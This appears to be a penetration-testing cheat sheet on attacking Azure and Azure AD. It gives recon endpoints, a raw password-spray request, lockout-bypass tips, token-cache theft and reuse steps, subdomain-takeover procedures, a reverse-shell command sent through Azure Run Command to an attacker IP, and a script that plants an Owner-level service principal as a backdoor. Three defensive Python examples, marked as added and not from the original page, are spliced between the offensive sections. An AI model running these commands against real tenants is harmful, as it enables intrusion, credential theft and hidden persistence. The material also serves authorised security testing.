Pentest Book
Azure

Basic Info

**Tools**
https://github.com/dirkjanm/ROADtools
https://github.com/dafthack/PowerMeta
https://github.com/NetSPI/MicroBurst
https://github.com/nccgroup/ScoutSuite
https://github.com/hausec/PowerZure
https://github.com/fox-it/adconnectdump
https://github.com/FSecureLABS/Azurite
https://github.com/mburrough/pentestingazureapps
https://github.com/Azure/Stormspotter
https://github.com/nccgroup/azucar
https://github.com/dafthack/MSOLSpray
https://github.com/BloodHoundAD/BloodHound
https://github.com/nccgroup/Carnivore
https://github.com/CrowdStrike/CRT
https://github.com/Kyuu-Ji/Awesome-Azure-Pentest
https://github.com/cyberark/blobhunter
https://github.com/Gerenios/AADInternals

- Check if company is using Azure AD:
https://login.microsoftonline.com/[email protected]&xml=1
- If NameSpaceType is "Managed", the company uses Azure AD
- Enumerate Azure AD emails
https://github.com/LMGsec/o365creeper

Auth methods:
• Password Hash Synchronization
  ◇ Azure AD Connect
  ◇ On-prem service synchronizes hashed user credentials to Azure
  ◇ User can authenticate directly to Azure services like O365 with their internal domain credential
• Pass Through Authentication
  ◇ Credentials stored only on-prem
  ◇ On-prem agent validates authentication requests to Azure AD
  ◇ Allows SSO to other Azure apps without creds stored in cloud
• Active Directory Federation Services (ADFS)
  ◇ Credentials stored only on-prem
  ◇ Federated trust is set up between Azure and on-prem AD to validate auth requests to the cloud
  ◇ For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
• Certificate-based auth
  ◇ Client certs for authentication to API
  ◇ Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
  ◇ Service Principals can be set up with certs to auth
• Conditional access policies
• Long-term access tokens
  ◇ Authentication to Azure with OAuth tokens
  ◇ Desktop CLI tools that can be used to auth store access tokens on disk
  ◇ These tokens can be reused on other MS endpoints
  ◇ We have a lab on this later!
• Legacy authentication portals

Recon:
• O365 Usage
  ◇ https://login.microsoftonline.com/[email protected]&xml=1
  ◇ https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1
• User enumeration on Azure can be performed at
  https://login.Microsoft.com/common/oauth2/token
    ▪ This endpoint tells you if a user exists or not
  ◇ Detect invalid users while password spraying with:
    ▪ https://github.com/dafthack/MSOLSpray
  ◇ For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)
• Auth 365 Recon:
  https://github.com/nyxgeek/o365recon

Microsoft Azure Storage:
• Microsoft Azure Storage is like Amazon S3
• Blob storage is for unstructured data
• Containers and blobs can be publicly accessible via access policies
• Predictable URLs at core.windows.net
  ◇ storage-account-name.blob.core.windows.net
  ◇ storage-account-name.file.core.windows.net
  ◇ storage-account-name.table.core.windows.net
  ◇ storage-account-name.queue.core.windows.net
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
• The “Container” access policy allows for listing containers and blobs
• MicroBurst https://github.com/NetSPI/MicroBurst
  ◇ Invoke-EnumerateAzureBlobs
  ◇ Brute forces storage account names, containers, and files
  ◇ Uses permutations to discover storage accounts
PS> Invoke-EnumerateAzureBlobs -Base

Password Attacks
• Password Spraying Microsoft Online (Azure/O365)
• Can spray https://login.microsoftonline.com
--
POST /common/oauth2/token HTTP/1.1
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Host: login.microsoftonline.com
Content-Length: 195
Expect: 100-continue
Connection: close

resource=https%3A%2F%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&password=Winter2020&scope=openid
--
• MSOLSpray https://github.com/dafthack/MSOLSpray
  ◇ The script logs:
    ▪ If a user cred is valid
    ▪ If MFA is enabled on the account
    ▪ If a tenant doesn't exist
    ▪ If a user doesn't exist
    ▪ If the account is locked
    ▪ If the account is disabled
    ▪ If the password is expired
  ◇ https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes

Password protections & Smart Lockout
• Azure Password Protection – Prevents users from picking passwords with certain words like seasons, company name, etc.
• Azure Smart Lockout – Locks out auth attempts whenever brute force or spray attempts are detected.
  ◇ Can be bypassed with FireProx + MSOLSpray
  ◇ https://github.com/ustayready/fireprox

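A defender-side view of the spray and Smart Lockout notes above, as an added example (not from the original page or from MSOLSpray): it groups failed sign-ins by time window instead of by source IP, so a spray spread across rotating proxy addresses still stands out. The record layout, thresholds and sample rows are assumptions made for the example; the result codes are AADSTS codes from the error-code reference linked above.

```python
from collections import Counter
from datetime import datetime, timedelta

# AADSTS result codes, grouped by what they tell a defender.
GUESS_FAILED = {"50126", "50034", "50053"}             # bad password / unknown user / locked
PASSWORD_ACCEPTED = {"0", "50076", "50079", "50055"}   # success / MFA required / MFA enrollment / expired

# Constructed sign-in export: timestamp,user,source_ip,app_id,result_code
SPRAY_APP = "1b730954-1685-4b74-9bfd-dac224a7b894"     # client_id from the request shown above
SAMPLE = f"""\
2024-03-01T08:00:05,alice@example.com,198.51.100.7,mail-client,50126
2024-03-01T08:00:40,alice@example.com,198.51.100.7,mail-client,50126
2024-03-01T08:01:10,alice@example.com,198.51.100.7,mail-client,0
2024-03-01T12:00:00,alice@example.com,203.0.113.10,{SPRAY_APP},50126
2024-03-01T12:01:00,bob@example.com,203.0.113.11,{SPRAY_APP},50126
2024-03-01T12:02:00,carol@example.com,203.0.113.12,{SPRAY_APP},50126
2024-03-01T12:03:00,dana@example.com,203.0.113.13,{SPRAY_APP},50076
2024-03-01T12:04:00,erin@example.com,203.0.113.14,{SPRAY_APP},50126
2024-03-01T12:05:00,frank@example.com,203.0.113.15,{SPRAY_APP},50034
2024-03-01T12:06:00,grace@example.com,203.0.113.16,{SPRAY_APP},50126
2024-03-01T12:06:30,heidi@example.com,198.51.100.9,mail-client,0
"""

def parse(text):
    """Turn the CSV export into time-ordered (time, user, ip, app, code) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, user, ip, app, code = line.split(",")
        events.append((datetime.fromisoformat(ts), user.lower(), ip, app, code))
    return sorted(events)

def max_failures_per_ip(events):
    """What a per-IP threshold sees: (ip, failure count) for the noisiest address."""
    counts = Counter(e[2] for e in events if e[4] in GUESS_FAILED)
    return counts.most_common(1)[0]

def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Flag windows in which many distinct accounts each fail only a few times."""
    failures = [e for e in events if e[4] in GUESS_FAILED]
    findings, i = [], 0
    while i < len(failures):
        start = failures[i][0]
        batch = [e for e in failures[i:] if e[0] < start + window]
        per_user = Counter(e[1] for e in batch)
        slow = [u for u, n in per_user.items() if n <= max_per_user]
        if len(slow) >= min_users:
            apps = {e[3] for e in batch}
            findings.append({
                "start": start.isoformat(),
                "sprayed_users": len(slow),
                "source_ips": len({e[2] for e in batch}),
                # Password accepted by the same client app inside the window:
                # reset these accounts first, even where MFA stopped the sign-in.
                "password_accepted": sorted({
                    e[1] for e in events
                    if e[4] in PASSWORD_ACCEPTED and e[3] in apps
                    and start <= e[0] < start + window}),
            })
            i += len(batch)      # continue after the flagged window
        else:
            i += 1
    return findings

if __name__ == "__main__":
    ev = parse(SAMPLE)
    print("noisiest single IP:", max_failures_per_ip(ev))
    for finding in detect_spray(ev):
        print(finding)
```

In the sample, the noisiest single address is a user mistyping a password, while the spray never exceeds one failure per address and is only visible in the per-window view.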
Phishing session hijack
• Evilginx2 and Modlishka
  ◇ MitM frameworks for harvesting creds/sessions
  ◇ Can also evade 2FA by riding user sessions
• With a hijacked session we need to move fast
• Session timeouts can limit access
• Persistence is necessary

Steal Access Tokens
• Azure config files:
  web.config
  app.config
  .cspkg
  .publishsettings
• Azure Cloud Service Packages (.cspkg)
• Deployment files created by Visual Studio
• Possible other Azure service integration (SQL, Storage, etc.)
• Look through cspkg zip files for creds/certs
• Search Visual Studio Publish directory
  \bin\debug\publish
• Azure Publish Settings files (.publishsettings)
  ◇ Designed to make it easier for developers to push code to Azure
  ◇ Can contain a Base64 encoded Management Certificate
  ◇ Sometimes cleartext credentials
  ◇ Open publishsettings file in text editor
  ◇ Save “ManagementCertificate” section into a new .pfx file
  ◇ There is no password for the pfx
  ◇ Search the user’s Downloads directory and VS projects
• Check %USERPROFILE%\.azure\ for auth tokens
• During an authenticated session with the Az PowerShell module a TokenCache.dat file gets generated in the %USERPROFILE%\.azure\ folder.
• Also search disk for other saved context files (.json)
• Multiple tokens can exist in the same context file

Post-Compromise
• What can we learn with a basic user?
• Subscription Info
• User Info
• Resource Groups
• Scavenging Runbooks for Creds
• Standard users can access Azure domain information, which usually isn’t locked down
• Authenticated users can go to portal.azure.com and click Azure Active Directory
• O365 Global Address List has this info as well
• Even if portal is locked down PowerShell cmdlets will still likely work
• There is a company-wide setting that locks down the entire org from viewing Azure info via cmd line: Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false

Azure: CLI Access
• Azure Service Management (ASM or Azure “Classic”)
  ◇ Legacy and recommended to not use
• Azure Resource Manager (ARM)
  ◇ Added service principals, resource groups, and more
  ◇ Management Certs not supported
• PowerShell Modules
  ◇ Az, AzureAD & MSOnline
• Azure Cross-platform CLI Tools
  ◇ Linux and Windows client

Azure: Subscriptions
• Organizations can have multiple subscriptions
• A good first step is to determine what subscription you are in
• The subscription name is usually informative
• It might have “Prod”, or “Dev” in the title
• Multiple subscriptions can be under the same Azure AD directory (tenant)
• Each subscription can have multiple resource groups

Azure User Information
• Built-In Azure Subscription Roles
  ◇ Owner (full control over resource)
  ◇ Contributor (All rights except the ability to change permissions)
  ◇ Reader (can only read attributes)
  ◇ User Access Administrator (manage user access to Azure resources)
• Get the current user’s role assignment
PS> Get-AzRoleAssignment
• If the Azure portal is locked down it is still possible to access Azure AD user information via MSOnline cmdlets
• The below examples enumerate users and groups
PS> Import-Module MSOnline
PS> Connect-MsolService
Or
PS> $credential = Get-Credential
PS> Connect-MsolService -Credential $credential

PS> Get-MSolUser -All
PS> Get-MSolGroup -All
PS> Get-MSolGroupMember -GroupObjectId
PS> Get-MSolCompanyInformation
• Pipe Get-MSolUser -All to format list to get all user attributes
PS> Get-MSolUser -All | fl

Azure Resource Groups
• Resource Groups collect various services for easier management
• Recon can help identify the relationships between services such as WebApps and SQL
PS> Get-AzResource
PS> Get-AzResourceGroup
PS> Get-AzStorageAccount

Azure: Runbooks
• Azure Runbooks automate various tasks in Azure
• Require an Automation Account and can contain sensitive information like passwords
PS> Get-AzAutomationAccount
PS> Get-AzAutomationRunbook -AutomationAccountName -ResourceGroupName
• Export a runbook with:
PS> Export-AzAutomationRunbook -AutomationAccountName -ResourceGroupName -Name -OutputFolder .\Desktop\

Azure VMs:
PS> Get-AzVM
PS> $vm = Get-AzVM -Name "VM Name"
PS> $vm.OSProfile
PS> Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

Azure Virtual Networks:
PS> Get-AzVirtualNetwork
PS> Get-AzPublicIpAddress
PS> Get-AzExpressRouteCircuit
PS> Get-AzVpnConnection

# Quick 1-liner to search all Azure AD user attributes for passwords after auth'ing with Connect-MsolService:
$x=Get-MsolUser;foreach($u in $x){$p = @();$u|gm|%{$p+=$_.Name};ForEach($s in $p){if($u.$s -like "*password*"){Write("[*]"+$u.UserPrincipalName+"["+$s+"]"+" : "+$u.$s)}}}

# https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Removing Azure services
- Under Azure Portal -> Resource Groups

# Interesting metadata instance urls:
http://169.254.169.254/metadata/v1/maintenance
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

Traditional AD - Azure AD comparison

Basic Azure AD concepts and tips

- Source of authentication for Office 365, Azure Resource Manager, and anything else you integrate with it.

- PowerShell interaction:
  • MSOnline PowerShell module
    • Focuses on Office 365
    • Some Office 365 specific features
  • AzureAD PowerShell module
    • General Azure AD
    • Different feature set
  • Azure CLI / Az PowerShell module
    • More focus on Azure Resource Manager

- Azure AD principals
  • Users
  • Devices
  • Applications

- Azure AD roles
  • RBAC Roles are only used for Azure Resource Manager
  • Office 365 uses administrator roles exclusively

- Azure AD admin roles
  • Global/Company administrator can do anything
  • Limited administrator accounts
    • Application Administrator
    • Authentication Administrator
    • Exchange Administrator
    • Etc
  • Roles are fixed

- Azure AD applications
  • Documentation unclear
  • Terminology different between documentation, APIs and Azure portal
  • Complex permission system
  • Most confusing part
  • Examples:
    • Microsoft Graph
    • Azure Multi-Factor Auth Client
    • Azure Portal
    • Office 365 portal
    • Azure ATP
  • A default Office 365 Azure AD has about 200 service principals (read: applications)

- App permissions
  • Two types of privileges:
    • Delegated permissions
      • Require signed-in user present to utilize
    • Application permissions
      • Are assigned to the application, which can use them at any time
  • These privileges are assigned to the service principal
  • Every application defines permissions
  • Can be granted to Service Principals
  • Commonly used:
    • Microsoft Graph permissions
    • Azure AD Graph permissions

- Azure AD Sync Account
  • Dump all on-premise password hashes (if PHS is enabled)
  • Log in on the Azure portal (since it’s a user)
  • Bypass conditional access policies for admin accounts
  • Add credentials to service principals
  • Modify service principals properties

If password hash sync is in use:
Compromised Azure AD connect Sync account = Compromised AD

• Encryption key is encrypted with DPAPI
• Decrypted version contains some blob with AES keys
• Uses AES-256 in CBC mode

Anyone with control over Service Principals can assign credentials to them and potentially escalate privileges.

Anyone who can edit properties* of the AZUREADSSOACC$ account, can impersonate any user in Azure AD using Kerberos (if no MFA)

Azure attacks examples

# Password spraying
https://github.com/dafthack/MSOLSpray/MSOLSpray.ps1
Create a text file with ten (10) fake users we will spray along with your own user account ([email protected] ). (Do not spray accounts you do not own. You may use my domain “glitchcloud.com” for generating fake target users) and save as userlist.txt

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password you set for your test account]

# Access Token

PS> Import-Module Az
PS> Connect-AzAccount
or
PS> $credential = Get-Credential
PS> Connect-AzAccount -Credential $credential

PS> mkdir C:\Temp
PS> Save-AzContext -Path C:\Temp\AzureAccessToken.json
PS> mkdir "C:\Temp\Live Tokens"

# Auth
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential

Open Windows Explorer and type %USERPROFILE%\.Azure\ and hit enter
• Copy TokenCache.dat & AzureRmContext.json to C:\Temp\Live Tokens
• Now close your authenticated PowerShell window!

Delete everything in %USERPROFILE%\.azure\
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently

• In your PowerShell window let’s manipulate the stolen TokenCache.dat and AzureRmContext.json files so we can import them into our PowerShell session

PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding byte
PS> $b64 = [Convert]::ToBase64String($bytes)
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64

• Now let’s add the b64-token.txt to the AzureRmContext.json file.
• Open the C:\Temp\Live Tokens folder.
• Open the AzureRmContext.json file in Notepad and find the line near the end of the file titled “CacheData”. It should be null.
• Delete the word “null” on this line
• Where “null” was, add two quotation marks ("") and then paste the contents of b64-token.txt in between them.
• Save this file as C:\Temp\Live Tokens\StolenToken.json
• Let’s import the new token

PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

• We are now operating in an authenticated session to Azure

PS> $context = Get-AzContext
PS> $context.Account

• You can import the previously exported context (AzureAccessToken.json) the same way

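A hygiene check for what the "Steal Access Tokens" notes and the lab above rely on, as an added example (not from the original page or the Az module): it walks a profile directory and reports non-empty TokenCache.dat files and any JSON file carrying a non-null "CacheData" value, without printing the token material. Only the file name and the "CacheData" key come from the page; the JSON layout and file contents in `demo()` are constructed.

```python
import json
import tempfile
from pathlib import Path

def embedded_caches(node, where="$"):
    """Yield the JSON path of every non-empty "CacheData" value, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{where}.{key}"
            if key == "CacheData" and value:
                yield here
            else:
                yield from embedded_caches(value, here)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from embedded_caches(value, f"{where}[{i}]")

def audit_token_files(root):
    """Return (relative path, reason) for files that hold reusable token material."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() == "tokencache.dat":
            if path.stat().st_size > 0:       # an empty cache holds nothing to reuse
                findings.append((rel, "token cache file"))
        elif path.suffix.lower() == ".json":
            try:
                doc = json.loads(path.read_text(encoding="utf-8-sig"))
            except (OSError, ValueError):     # unreadable or not JSON: not a context file
                continue
            findings.extend((rel, f"embedded token cache at {w}")
                            for w in embedded_caches(doc))
    return findings

def demo():
    """Build a constructed profile tree and audit it (all file contents are made up)."""
    empty_ctx = {"DefaultContextKey": "Default",
                 "Contexts": {"Default": {"TokenCache": {"CacheData": None}}}}
    saved_ctx = {"DefaultContextKey": "Default",
                 "Contexts": {"Default": {"TokenCache": {"CacheData": "Q09OU1RSVUNURUQ="}}}}
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        (home / ".azure").mkdir()
        (home / "Desktop").mkdir()
        (home / ".azure" / "TokenCache.dat").write_bytes(b"constructed-cache-bytes")
        (home / ".azure" / "AzureRmContext.json").write_text(json.dumps(empty_ctx))
        (home / "Desktop" / "saved-context.json").write_text(json.dumps(saved_ctx))
        (home / "Desktop" / "notes.json").write_text("not json at all")
        return audit_token_files(home)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Context files with a null "CacheData" are not reported, which matches the state the lab describes before a token is pasted in.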
# Azure situational awareness
• GOAL: Use the MSOnline and Az PowerShell modules to do basic enumeration of an Azure account post-compromise.
• In this lab you will authenticate to Azure using the Azure AD account you set up. Then, you will import the MSOnline and Az PowerShell modules and try out some of the various modules that assist in enumerating Azure resource usage.

• Start a new PowerShell window and import both the MSOnline and Az modules
PS> Import-Module MSOnline
PS> Import-Module Az
• Authenticate to each service with your Azure AD account:
PS> Connect-AzAccount
PS> Connect-MsolService
• First get some basic Azure information
PS> Get-MSolCompanyInformation
• Some interesting items here are
  ◇ UsersPermissionToReadOtherUsersEnabled
  ◇ DirSyncServiceAccount
  ◇ PasswordSynchronizationEnabled
  ◇ Address/phone/emails
• Next, we will start looking at the subscriptions associated with the account as well as look at the current context we are operating in. Look at the “Name” of the subscription and context for possible indication as to what it is associated with.
PS> Get-AzSubscription
PS> $context = Get-AzContext
PS> $context.Name
PS> $context.Account
• Enumerating the roles assigned to your user will help identify what permissions you might have on the subscription as well as who to target for escalation.
PS> Get-AzRoleAssignment
• List out the users on the subscription. This is the equivalent of “net users /domain” in on-prem AD
PS> Get-MSolUser -All
PS> Get-AzAdApplication
PS> Get-AzWebApp
PS> Get-AzSQLServer
PS> Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
PS> Get-AzSqlServerFirewallRule -ServerName $ServerName -ResourceGroupName $ResourceGroupName
PS> Get-AzSqlServerActiveDirectoryAdministrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
• The user you set up likely doesn’t have any resources currently associated with it, but these commands will help to understand the specific resources a user you gain access to has.
PS> Get-AzResource
PS> Get-AzResourceGroup
• Choose a subscription
PS> Select-AzSubscription -SubscriptionID "SubscriptionID"
• There are many other functions.
• Use Get-Module to list out the other Az module groups
• To list out functions available within each module use the below command substituting the value of the “Name” parameter.
PS> Get-Module -Name Az.Accounts | Select-Object -ExpandProperty ExportedCommands
PS> Get-Module -Name MSOnline | Select-Object -ExpandProperty ExportedCommands

Azure Block Blobs (S3 equivalent) attacks

# Discovering with Google Dorks
site:*.blob.core.windows.net
site:*.blob.core.windows.net ext:xlsx | ext:csv "password"
# Discovering with DNS enumeration
python dnscan.py -d blob.core.windows.net -w subdomains-100.txt

# When you find one, try it with curl; an empty container responds with 400

# List containers
az storage container list --connection-string '<connection string>'
# List blobs in containers
az storage blob list --container-name <container name> --connection-string '<connection string>'
# Download blob from container
az storage blob download --container-name <container name> --name <file> --file /tmp/<file> --connection-string '<connection string>'

Azure subdomain takeovers

# Azure CloudApp: cloudapp.net
1. Check CNAME with dig pointing to cloudapp.net
2. Go to https://portal.azure.com/?quickstart=True#create/Microsoft.CloudService
3. Register the unclaimed domain the CNAME is pointing to


# Azure Websites: azurewebsites.net
1. Check CNAME with dig pointing to azurewebsites.net
2. Go to https://portal.azure.com/#create/Microsoft.WebSite
3. Register the unclaimed domain the CNAME is pointing to
4. Register domain on the Custom domains section of the dashboard

# Azure VM: cloudapp.azure.com
1. Check CNAME with dig pointing to *.region.cloudapp.azure.com
2. Register a new VM in the same region with size Standard_B1ls (cheapest) with 80 and 443 open
3. Go to Configuration and set the domain name the CNAME is pointing to

Other Azure Services

# Azure App Services Subdomain Takeover
- For target example.com you found users.example.com
- Go to https://users.galaxybutter.com and get an error
- dig CNAME users.galaxybutter.com and get an Azure App Service that was probably deprecated or removed
- Create an App Service and point it to the missing CNAME
- Add a custom domain to the App Service
- Show custom content

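A defender-side inventory check for the conditions described in "Azure subdomain takeovers" and the App Services case above, as an added example (not from the original page): it reads your own zone export, picks out CNAMEs that point at the three Azure suffixes named there, and reports the ones whose target no longer resolves so the record can be removed or the resource re-created. The zone text and the offline resolver are constructed, and treating "does not resolve" as "unclaimed" is an assumption.

```python
import socket

# Azure-owned suffixes named in the takeover notes above.
AZURE_SUFFIXES = ("cloudapp.net", "azurewebsites.net", "cloudapp.azure.com")

def azure_suffix(target):
    """Return the Azure suffix a CNAME target falls under, or None."""
    name = target.rstrip(".").lower()
    for suffix in AZURE_SUFFIXES:
        if name.endswith("." + suffix):   # label boundary: "xazurewebsites.net" must not match
            return suffix
    return None

def parse_cnames(zone_text):
    """Yield (owner, target) from 'owner [ttl] [IN] CNAME target' lines; ';' starts a comment."""
    for line in zone_text.splitlines():
        fields = line.split(";", 1)[0].split()
        upper = [f.upper() for f in fields]
        if "CNAME" in upper[1:]:
            idx = upper.index("CNAME", 1)
            if idx + 1 < len(fields):
                yield fields[0], fields[idx + 1].rstrip(".").lower()

def system_resolves(name):
    """Default check: True if the name currently resolves to any address."""
    try:
        socket.getaddrinfo(name, None)
        return True
    except socket.gaierror:
        return False

def dangling_azure_cnames(zone_text, resolves=system_resolves):
    """Return (owner, target, suffix) for Azure CNAMEs whose target does not resolve."""
    findings = []
    for owner, target in parse_cnames(zone_text):
        suffix = azure_suffix(target)
        if suffix and not resolves(target):
            findings.append((owner, target, suffix))
    return findings

# Constructed zone export for example.com.
ZONE = """\
; constructed sample records
www     3600 IN CNAME example-prod.azurewebsites.net.
users   3600 IN CNAME example-users.azurewebsites.net.
legacy  3600 IN CNAME example-legacy.cloudapp.net.
vm      3600 IN CNAME example-vm.westeurope.cloudapp.azure.com.
shop    3600 IN CNAME shop.example-cdn.test.
mail    3600 IN A     192.0.2.25
"""
# Constructed set of targets that still exist, standing in for live DNS.
LIVE = {"example-prod.azurewebsites.net", "example-vm.westeurope.cloudapp.azure.com"}

def offline_resolver(name):
    """Stand-in for DNS so the sample runs without network access."""
    return name in LIVE

if __name__ == "__main__":
    for owner, target, suffix in dangling_azure_cnames(ZONE, offline_resolver):
        print(f"{owner} -> {target} ({suffix}): target does not resolve")
```

Against a real zone, call `dangling_azure_cnames(zone_text)` without the second argument to use the system resolver.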
# Azure Run Command
# Feature that allows you to execute commands without requiring SSH or SMB/RDP access to a machine. This is very similar to AWS SSM.
az login
az login --use-device-code #Login
az group list #List groups
az vm list -g GROUP-NAME #List VMs inside group
#Linux VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "id"
#Windows VM
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunPowerShellScript --scripts "whoami"
# Linux Reverse Shell Azure Command
az vm run-command invoke -g GROUP-NAME -n VM-NAME --command-id RunShellScript --scripts "bash -c \"bash -i >& /dev/tcp/ATTACKER-EXTERNAL-IP/9090 0>&1\""

# Azure SQL Databases
- MSSQL syntax
- Dorks: "database.windows.net" site:pastebin.com

# Azure AD commands
az ad sp list --all
az ad app list --all

# Azure metadata service
http://169.254.169.254/metadata/instance
https://github.com/microsoft/azureimds

Create Azure service principal as backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
# Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "tenant ID" -ServicePrincipal

Azure password reset

Azure Services Summary

Base services

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Virtual Machines | Servers | Move existing apps to the cloud without changing them. You manage the entire computer. | EC2 |
| Cloud Services | Managed Virtual Machines | Run applications on virtual machines that you don't have to manage, but can partially manage. | |
| Batch | Azure Distributed Processing | Work on a large chunk of data by divvying it up between a whole bunch of machines. | |
| RemoteApp | Remote Desktop for Apps | Expose non-web apps to users. For example, run Excel on your iPad. | AppStream |
| Web Apps | Web Site Host | Run websites (.NET, Node.js, etc.) without managing anything extra. Scale automatically and easily. | Elastic Beanstalk |
| Mobile Apps | Mobile App Accelerator | Quickly get an app backend up and running. | |
| Logic Apps | Visio for Doing Stuff | Chain steps together to get stuff done. | |
| API Apps | API Host | Host your API's without any of the management overhead. | |
| API Management | API Proxy | Expose an API and off-load things like billing, authentication, and caching. | API Gateway |

Mobile

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Notification Hubs | Notification Blaster | Send notifications to all of your users, or groups of users based on things like zip code. All platforms. | SNS |
| Mobile Engagement | Mobile Psychic | Track what users are doing in your app, and customize experience based on this data. | |

Storage

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| SQL Database | Azure SQL | Use the power of a SQL Server cluster without having to manage it. | RDS |
| Document DB | Azure NoSQL | Use an unstructured JSON database without having to manage it. | Dynamo DB |
| Redis Cache | Easy Cache | Cache files in memory in a scalable way. | Elasticache |
| Storage Blobs | Cloud File System | Store files, virtual disks, and build other storage services on top of. | S3 |
| Azure Search | Index & Search | Add search capabilities to your website, or index data stored somewhere else. | CloudSearch |
| SQL Data Warehouse | Structured Report Database | Store all of your company's data in a structured format for reporting. | RedShift |
| Azure Data Lake | Unstructured Report Database | Store all of your company's data in any format for reporting. | |
| HDInsight | Hosted Hadoop | Do Hadoopy things with massive amounts of data. | |
| Machine Learning | Skynet | Train AI to predict the future using existing data. Examples include credit card fraud detection and Netflix movie recommendations. | |
| Stream Analytics | Real-time data query | Look for patterns in data as it arrives. | |
| Data Factory | Azure ETL | Orchestrate extract, transform, and load data processes. | Data Pipeline |
| Event Hubs | IoT Ingestor | Ingest data at ANY scale inexpensively. | |

Networking

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Virtual Network | Private Network | Put machines on the same, private network so that they talk to each other directly and privately. Expose services to the internet as needed. | |
| ExpressRoute | Fiber to Azure | Connect privately over an insanely fast pipe to an Azure datacenter. Make your local network part of your Azure network. | Direct Connect |
| Load Balancer | Load Balancer | Split load between multiple services, and handle failures. | |
| Traffic Manager | Datacenter Load Balancer | Split load between multiple datacenters, and handle datacenter outages. | |
| DNS | DNS Provider | Run a DNS server so that your domain names map to the correct IP addresses. | Route53 |
| VPN Gateway | Virtual Fiber to Azure | Connect privately to an Azure datacenter. Make your local network part of your Azure network. | |
| Application Gateway | Web Site Proxy | Proxy all of your HTTP traffic. Host your SSL certs. Load balance with sticky sessions. | |
| CDN | CDN | Make your sites faster and more scalable by putting your static files on servers around the world close to your end users. | Cloudfront |
| Media Services | Video Processor | Transcode video and distribute and manage it on the scale of the Olympics. | Elastic Transcoder |

Management

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Azure Resource Manager | Declarative Configuration | Define your entire Azure architecture as a repeatable JSON file and deploy all at once. | CloudFormation |

Developer

| Azure Service | Could be Called | Use this to... | Like AWS... |
| --- | --- | --- | --- |
| Application Insights | App Analytics | View detailed information about how your apps (web, mobile, etc.) are used. | Mobile Analytics |
| Service Fabric | Cloud App Framework | Build a cloud optimized application that can scale and handle failures inexpensively. | |

Last modified 5mo ago